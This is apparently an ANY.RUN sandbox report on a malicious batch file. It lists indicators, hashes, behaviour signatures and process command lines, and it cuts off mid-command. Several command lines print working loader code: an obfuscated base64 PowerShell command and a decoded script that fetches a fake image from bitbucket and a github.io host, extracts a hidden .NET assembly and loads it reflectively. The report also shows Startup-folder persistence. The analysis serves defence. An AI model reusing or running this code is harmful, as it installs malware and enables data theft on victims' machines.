File name:

4ix598.bat

Full analysis: https://app.any.run/tasks/bf41c96d-a02a-481b-93d4-d97be4daa563
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: May 27, 2025, 19:26:01
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
stegocampaign
payload
loader
reverseloader
auto-startup
ta558
apt
susp-powershell
crypto-regex
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, Non-ISO extended-ASCII text, with CRLF, NEL line terminators
MD5:

23C3470F4DAA563D06DE713A83090994

SHA1:

44653D3441F340DB124CC7B6DF9E7A880EA268FC

SHA256:

23B0E8E5892B4C9A872AF00F252BCA6004B187B89E23AF6C9D17F7CDCF22C393

SSDEEP:

384:6W6A68qp0a11G6wguI5aaZSxTysItFLjwPtO46zBy:6PA6840iLtpjSR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • STEGOCAMPAIGN has been detected

      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7352)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7352)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7352)

    • Create files in the Startup directory

      • powershell.exe (PID: 8012)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 8012)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7732)
      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7316)
      • cmd.exe (PID: 2616)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7316)
      • powershell.exe (PID: 7352)

    • Probably obfuscated PowerShell command line is found

      • cmd.exe (PID: 7732)
      • cmd.exe (PID: 2616)

    • Get information on the list of running processes

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7316)

    • Probably download files using WebClient

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7316)

    • Application launched itself

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7316)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7352)

    • Returns all items found within a container (POWERSHELL)

      • powershell.exe (PID: 8012)

    • Connects to unusual port

      • RegAsm.exe (PID: 8152)

    • Found regular expressions for crypto-addresses (YARA)

      • RegAsm.exe (PID: 8152)

    • There is functionality for taking screenshot (YARA)

      • RegAsm.exe (PID: 8152)

  • INFO

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7316)

    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7316)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 7800)
      • powershell.exe (PID: 7316)

    • Reads the software policy settings

      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7352)
      • slui.exe (PID: 7492)

    • Create files in a temporary directory

      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7352)

    • Disables trace logs

      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7352)

    • Checks proxy server information

      • powershell.exe (PID: 7888)
      • slui.exe (PID: 7492)
      • powershell.exe (PID: 7352)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7352)

    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 7888)
      • powershell.exe (PID: 7352)

    • Returns hidden items found within a container (POWERSHELL)

      • powershell.exe (PID: 8012)
      • conhost.exe (PID: 8020)
      • conhost.exe (PID: 1512)

    • Auto-launch of the file from Startup directory

      • powershell.exe (PID: 8012)

    • Found Base64 encoded network access via PowerShell (YARA)

      • powershell.exe (PID: 7800)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • powershell.exe (PID: 7800)

    • Found Base64 encoded access to processes via PowerShell (YARA)

      • powershell.exe (PID: 7800)

    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 7800)

    • Reads the computer name

      • RegAsm.exe (PID: 8152)
      • RegAsm.exe (PID: 5376)

    • Reads the machine GUID from the registry

      • RegAsm.exe (PID: 8152)
      • RegAsm.exe (PID: 5376)

    • Manual execution by a user

      • cmd.exe (PID: 2616)

    • Checks supported languages

      • RegAsm.exe (PID: 8152)
      • RegAsm.exe (PID: 5376)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
134
Monitored processes
14
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs powershell.exe no specs #STEGOCAMPAIGN powershell.exe powershell.exe conhost.exe no specs regasm.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs #STEGOCAMPAIGN powershell.exe svchost.exe regasm.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
1512\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2616C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.bat""C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
5376"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Exit code:
2
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regasm.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
7316powershell "$ddsdgo = 'Id@d@gd@Cd@d@WwBOd@GUd@dd@d@ud@FMd@ZQByd@HYd@aQBjd@GUd@Ud@Bvd@Gkd@bgB0d@E0d@YQBud@GEd@ZwBld@HId@XQd@6d@Dod@UwBld@GMd@dQByd@Gkd@dd@B5d@Fd@d@cgBvd@HQd@bwBjd@G8d@bd@d@gd@D0d@Id@Bbd@E4d@ZQB0d@C4d@UwBld@GMd@dQByd@Gkd@dd@B5d@Fd@d@cgBvd@HQd@bwBjd@G8d@bd@BUd@Hkd@cd@Bld@F0d@Ogd@6d@FQd@bd@Bzd@DEd@Mgd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@Bmd@HUd@bgBjd@HQd@aQBvd@G4d@Id@BEd@G8d@dwBud@Gwd@bwBhd@GQd@Rd@Bhd@HQd@YQBGd@HId@bwBtd@Ewd@aQBud@Gsd@cwd@gd@Hsd@Id@Bwd@GEd@cgBhd@G0d@Id@d@od@Fsd@cwB0d@HId@aQBud@Gcd@WwBdd@F0d@Jd@Bsd@Gkd@bgBrd@HMd@KQd@gd@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@CQd@dwBld@GId@QwBsd@Gkd@ZQBud@HQd@Id@d@9d@Cd@d@TgBld@Hcd@LQBPd@GId@agBld@GMd@dd@d@gd@FMd@eQBzd@HQd@ZQBtd@C4d@TgBld@HQd@LgBXd@GUd@YgBDd@Gwd@aQBld@G4d@dd@d@7d@Cd@d@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@Bzd@Ggd@dQBmd@GYd@bd@Bld@GQd@Td@Bpd@G4d@awBzd@Cd@d@PQd@gd@Ecd@ZQB0d@C0d@UgBhd@G4d@Zd@Bvd@G0d@Id@d@td@Ekd@bgBwd@HUd@dd@BPd@GId@agBld@GMd@dd@d@gd@CQd@bd@Bpd@G4d@awBzd@Cd@d@LQBDd@G8d@dQBud@HQd@Id@d@kd@Gwd@aQBud@Gsd@cwd@ud@Ewd@ZQBud@Gcd@dd@Bod@Dsd@Id@d@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@Bmd@G8d@cgBld@GEd@YwBod@Cd@d@Kd@d@kd@Gwd@aQBud@Gsd@Id@Bpd@G4d@Id@d@kd@HMd@ad@B1d@GYd@ZgBsd@GUd@Zd@BMd@Gkd@bgBrd@HMd@KQd@gd@Hsd@Id@B0d@HId@eQd@gd@Hsd@Id@Byd@GUd@dd@B1d@HId@bgd@gd@CQd@dwBld@GId@QwBsd@Gkd@ZQBud@HQd@LgBEd@G8d@dwBud@Gwd@bwBhd@GQd@Rd@Bhd@HQd@YQd@od@CQd@bd@Bpd@G4d@awd@pd@Cd@d@fQd@gd@GMd@YQB0d@GMd@ad@d@gd@Hsd@Id@Bjd@G8d@bgB0d@Gkd@bgB1d@GUd@Id@B9d@Cd@d@fQd@7d@Cd@d@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@cgBld@HQd@dQByd@G4d@Id@d@kd@G4d@dQBsd@Gwd@Id@B9d@Dsd@Id@d@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@EId@eQB0d@GUd@cwd@gd@D0d@Id@d@nd@Ggd@dd@B0d@Ccd@Owd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@EId@eQB0d@GUd@cwd@yd@Cd@d@PQd@gd@Ccd@cd@Bzd@Dod@Lwd@vd@Ccd@Owd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@Gwd@ZgBzd@GQd@ZgBzd@GQd@Zwd@gd@D0d@Id@d@gd@CQd@QgB5d@HQd@ZQBzd@Cd@d@Kwd@kd@EId@eQB0d@GUd@cwd@yd@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@Bsd@Gkd@bgBrd@HMd@Id@d@9d@Cd@d@Qd@d@od@Cgd@Jd@Bsd@GYd@cwBkd@GYd@cwBkd@Gcd@Id@d@rd@Cd@d@JwBid@Gkd@dd@Bid@HUd@YwBrd@GUd@dd@d@ud@G8d@cgBnd@C8d@YwB6d@Hgd@ed@B4d@Hgd@ed@B4d@Hod@ed@B2d@C8d@ZwBkd@GYd@Zwd@vd@GQd@bwB3d@G4d@bd@Bvd@GEd@Zd@Bzd@C8d@cd@Bpd@GMd@LgBqd@Hd@d@Zwd@/d@DEd@Nd@d@yd@DMd@Nd@d@0d@Ccd@KQd@sd@Cd@d@Kd@d@kd@Gwd@ZgBzd@GQd@ZgBzd@GQd@Zwd@gd@Csd@Id@d@nd@G8d@ZgBpd@GMd@ZQd@zd@DYd@NQd@ud@Gcd@aQB0d@Ggd@dQBid@C4d@aQBvd@C8d@MQd@vd@HQd@ZQBzd@HQd@LgBqd@Hd@d@Zwd@nd@Ckd@KQd@7d@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@Bpd@G0d@YQBnd@GUd@QgB5d@HQd@ZQBzd@Cd@d@PQd@gd@EQd@bwB3d@G4d@bd@Bvd@GEd@Zd@BEd@GEd@dd@Bhd@EYd@cgBvd@G0d@Td@Bpd@G4d@awBzd@Cd@d@Jd@Bsd@Gkd@bgBrd@HMd@Owd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Gkd@Zgd@gd@Cgd@Jd@Bpd@G0d@YQBnd@GUd@QgB5d@HQd@ZQBzd@Cd@d@LQBud@GUd@Id@d@kd@G4d@dQBsd@Gwd@KQd@gd@Hsd@Id@d@kd@Gkd@bQBhd@Gcd@ZQBUd@GUd@ed@B0d@Cd@d@PQd@gd@Fsd@UwB5d@HMd@dd@Bld@G0d@LgBUd@GUd@ed@B0d@C4d@RQBud@GMd@bwBkd@Gkd@bgBnd@F0d@Ogd@6d@FUd@Vd@BGd@Dgd@LgBHd@GUd@dd@BTd@HQd@cgBpd@G4d@Zwd@od@CQd@aQBtd@GEd@ZwBld@EId@eQB0d@GUd@cwd@pd@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@HMd@dd@Bhd@HId@dd@BGd@Gwd@YQBnd@Cd@d@PQd@gd@Ccd@Pd@d@8d@EId@QQBTd@EUd@Ngd@0d@F8d@UwBUd@EEd@UgBUd@D4d@Pgd@nd@Dsd@Id@d@kd@GUd@bgBkd@EYd@bd@Bhd@Gcd@Id@d@9d@Cd@d@Jwd@8d@Dwd@QgBBd@FMd@RQd@2d@DQd@XwBFd@E4d@Rd@d@+d@D4d@Jwd@7d@Cd@d@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Cd@d@PQd@gd@CQd@aQBtd@GEd@ZwBld@FQd@ZQB4d@HQd@LgBJd@G4d@Zd@Bld@Hgd@TwBmd@Cgd@Jd@Bzd@HQd@YQByd@HQd@RgBsd@GEd@Zwd@pd@Dsd@Id@d@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@GUd@bgBkd@Ekd@bgBkd@GUd@ed@d@gd@D0d@Id@d@kd@Gkd@bQBhd@Gcd@ZQBUd@GUd@ed@B0d@C4d@SQBud@GQd@ZQB4d@E8d@Zgd@od@CQd@ZQBud@GQd@RgBsd@GEd@Zwd@pd@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@Bpd@GYd@Id@d@od@CQd@cwB0d@GEd@cgB0d@Ekd@bgBkd@GUd@ed@d@gd@C0d@ZwBld@Cd@d@Md@d@gd@C0d@YQBud@GQd@Id@d@kd@GUd@bgBkd@Ekd@bgBkd@GUd@ed@d@gd@C0d@ZwB0d@Cd@d@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Ckd@Id@B7d@Cd@d@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Cd@d@Kwd@9d@Cd@d@Jd@Bzd@HQd@YQByd@HQd@RgBsd@GEd@Zwd@ud@Ewd@ZQBud@Gcd@dd@Bod@Dsd@Id@d@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@GId@YQBzd@GUd@Ngd@0d@Ewd@ZQBud@Gcd@dd@Bod@Ggd@Id@d@9d@Cd@d@Jd@Bld@G4d@Zd@BJd@G4d@Zd@Bld@Hgd@Id@d@td@Cd@d@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@GId@YQBzd@GUd@Ngd@0d@EMd@bwBtd@G0d@YQBud@GQd@Id@d@9d@Cd@d@Jd@Bpd@G0d@YQBnd@GUd@Vd@Bld@Hgd@dd@d@ud@FMd@dQBid@HMd@dd@Byd@Gkd@bgBnd@Cgd@Jd@Bzd@HQd@YQByd@HQd@SQBud@GQd@ZQB4d@Cwd@Id@d@kd@GId@YQBzd@GUd@Ngd@0d@Ewd@ZQBud@Gcd@dd@Bod@Ggd@KQd@7d@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@GUd@bgBkd@Ekd@bgBkd@GUd@ed@d@gd@D0d@Id@d@kd@Gkd@bQBhd@Gcd@ZQBUd@GUd@ed@B0d@C4d@SQBud@GQd@ZQB4d@E8d@Zgd@od@CQd@ZQBud@GQd@RgBsd@GEd@Zwd@pd@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@GMd@bwBtd@G0d@YQBud@GQd@QgB5d@HQd@ZQBzd@Cd@d@PQd@gd@Fsd@UwB5d@HMd@dd@Bld@G0d@LgBDd@G8d@bgB2d@GUd@cgB0d@F0d@Ogd@6d@EYd@cgBvd@G0d@QgBhd@HMd@ZQd@2d@DQd@UwB0d@HId@aQBud@Gcd@Kd@d@kd@GId@YQBzd@GUd@Ngd@0d@EMd@bwBtd@G0d@YQBud@GQd@KQd@7d@Cd@d@Id@d@gd@CQd@ZQBud@GQd@SQBud@GQd@ZQB4d@Cd@d@PQd@gd@CQd@aQBtd@GEd@ZwBld@FQd@ZQB4d@HQd@LgBJd@G4d@Zd@Bld@Hgd@TwBmd@Cgd@Jd@Bld@G4d@Zd@BGd@Gwd@YQBnd@Ckd@Owd@gd@Cd@d@Id@d@kd@GUd@bgBkd@Ekd@bgBkd@GUd@ed@d@gd@D0d@Id@d@kd@Gkd@bQBhd@Gcd@ZQBUd@GUd@ed@B0d@C4d@SQBud@GQd@ZQB4d@E8d@Zgd@od@CQd@ZQBud@GQd@RgBsd@GEd@Zwd@pd@Dsd@Cgd@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Jd@Bsd@G8d@YQBkd@GUd@Zd@BBd@HMd@cwBld@G0d@YgBsd@Hkd@Id@d@9d@Cd@d@WwBTd@Hkd@cwB0d@GUd@bQd@ud@FId@ZQBmd@Gwd@ZQBjd@HQd@aQBvd@G4d@LgBBd@HMd@cwBld@G0d@YgBsd@Hkd@XQd@6d@Dod@Td@Bvd@GEd@Zd@d@od@CQd@YwBvd@G0d@bQBhd@G4d@Zd@BCd@Hkd@dd@Bld@HMd@KQd@7d@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@BHd@GUd@dd@d@td@Fd@d@cgBvd@GMd@ZQBzd@HMd@Id@B8d@Cd@d@UwBvd@HId@dd@d@td@E8d@YgBqd@GUd@YwB0d@Cd@d@QwBQd@FUd@Id@d@td@EQd@ZQBzd@GMd@ZQBud@GQd@aQBud@Gcd@Id@B8d@Cd@d@UwBld@Gwd@ZQBjd@HQd@LQBPd@GId@agBld@GMd@dd@d@gd@C0d@RgBpd@HId@cwB0d@Cd@d@NQd@gd@Hwd@Id@BGd@G8d@cgBtd@GEd@dd@d@td@FQd@YQBid@Gwd@ZQd@gd@E4d@YQBtd@GUd@Ld@BDd@Fd@d@VQd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@HQd@eQBwd@GUd@Id@d@9d@Cd@d@Jd@Bsd@G8d@YQBkd@GUd@Zd@BBd@HMd@cwBld@G0d@YgBsd@Hkd@LgBHd@GUd@dd@BUd@Hkd@cd@Bld@Cgd@JwB0d@GUd@cwB0d@Hd@d@bwB3d@GUd@cgBzd@Ggd@ZQBsd@Gwd@LgBId@G8d@YQBhd@GEd@YQBhd@GEd@cwBkd@G0d@ZQd@nd@Ckd@Owd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@BHd@GUd@dd@d@td@Fd@d@cgBvd@GMd@ZQBzd@HMd@Id@B8d@Cd@d@UwBvd@HId@dd@d@td@E8d@YgBqd@GUd@YwB0d@Cd@d@QwBQd@FUd@Id@d@td@EQd@ZQBzd@GMd@ZQBud@GQd@aQBud@Gcd@Id@B8d@Cd@d@UwBld@Gwd@ZQBjd@HQd@LQBPd@GId@agBld@GMd@dd@d@gd@C0d@RgBpd@HId@cwB0d@Cd@d@NQd@gd@Hwd@Id@BGd@G8d@cgBtd@GEd@dd@d@td@FQd@YQBid@Gwd@ZQd@gd@E4d@YQBtd@GUd@Ld@BDd@Fd@d@VQd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@kd@G0d@ZQB0d@Ggd@bwBkd@Cd@d@PQd@gd@CQd@dd@B5d@Hd@d@ZQd@ud@Ecd@ZQB0d@E0d@ZQB0d@Ggd@bwBkd@Cgd@JwBsd@GYd@cwBnd@GUd@Zd@Bkd@GQd@Zd@Bkd@GQd@Zd@Bhd@Ccd@KQd@ud@Ekd@bgB2d@G8d@awBld@Cgd@Jd@Bud@HUd@bd@Bsd@Cwd@Id@Bbd@G8d@YgBqd@GUd@YwB0d@Fsd@XQBdd@Cd@d@Kd@d@nd@HQd@ed@B0d@C4d@OQd@5d@DMd@Nd@Bfd@Dkd@Mgd@yd@Dcd@Od@d@yd@Dgd@Nd@d@3d@DEd@XwBkd@GEd@bwBsd@Hkd@YQBwd@C8d@bgBpd@GEd@bQd@vd@Hcd@YQByd@C8d@dd@Byd@G4d@ZQBtd@HUd@bgd@vd@Gcd@bwBid@G0d@YQBzd@C8d@ZwByd@G8d@LgB0d@GUd@awBjd@HUd@YgB0d@Gkd@Ygd@vd@C8d@OgBzd@Ccd@Ld@d@gd@Ccd@MQd@nd@Cwd@Id@d@nd@Fcd@aQBud@GQd@bwB3d@HMd@VQBwd@GQd@YQB0d@GUd@Jwd@sd@Cd@d@JwBSd@GUd@ZwBBd@HMd@bQd@nd@Cwd@Id@d@nd@Dd@d@Jwd@pd@Ckd@fQB9d@Dsd@Cgd@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($ddsdgo.replace('d@','A')));powershell.exe $OWjuxD"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
7352"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" " [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/czxxxxxxzxv/gdfg/downloads/pic.jpg?142344'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); Get-Process | Sort-Object CPU -Descending | Select-Object -First 5 | Format-Table Name,CPU $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); Get-Process | Sort-Object CPU -Descending | Select-Object -First 5 | Format-Table Name,CPU $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.9934_9227828471_daolyap/niam/war/trnemun/gobmas/gro.tekcubtib//:s', '1', 'WindowsUpdate', 'RegAsm', '0'))}}; "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7492C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7732C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\4ix598.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
7740\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7800powershell "$ddsdgo = 'Id@d@gd@Cd@d@WwBOd@GUd@dd@d@ud@FMd@ZQByd@HYd@aQBjd@GUd@Ud@Bvd@Gkd@bgB0d@E0d@YQBud@GEd@ZwBld@HId@XQd@6d@Dod@UwBld@GMd@dQByd@Gkd@dd@B5d@Fd@d@cgBvd@HQd@bwBjd@G8d@bd@d@gd@D0d@Id@Bbd@E4d@ZQB0d@C4d@UwBld@GMd@dQByd@Gkd@dd@B5d@Fd@d@cgBvd@HQd@bwBjd@G8d@bd@BUd@Hkd@cd@Bld@F0d@Ogd@6d@FQd@bd@Bzd@DEd@Mgd@Kd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@Bmd@HUd@bgBjd@HQd@aQBvd@G4d@Id@BEd@G8d@dwBud@Gwd@bwBhd@GQd@Rd@Bhd@HQd@YQBGd@HId@bwBtd@Ewd@aQBud@Gsd@cwd@gd@Hsd@Id@Bwd@GEd@cgBhd@G0d@Id@d@od@Fsd@cwB0d@HId@aQBud@Gcd@WwBdd@F0d@Jd@Bsd@Gkd@bgBrd@HMd@KQd@gd@d@od@Id@d@gd@Cd@d@Id@d@gd@Cd@d@Id@d@gd@CQd@dwBld@GId@QwBsd@Gkd@ZQBud@HQd@Id@d@9d@Cd@d@TgBld@Hcd@LQBPd@GId@agBld@GMd@dd@d@gd@FMd@eQBzd@HQd@ZQBtd@C4d@TgBld@HQd@LgBXd@GUd@YgBDd@Gwd@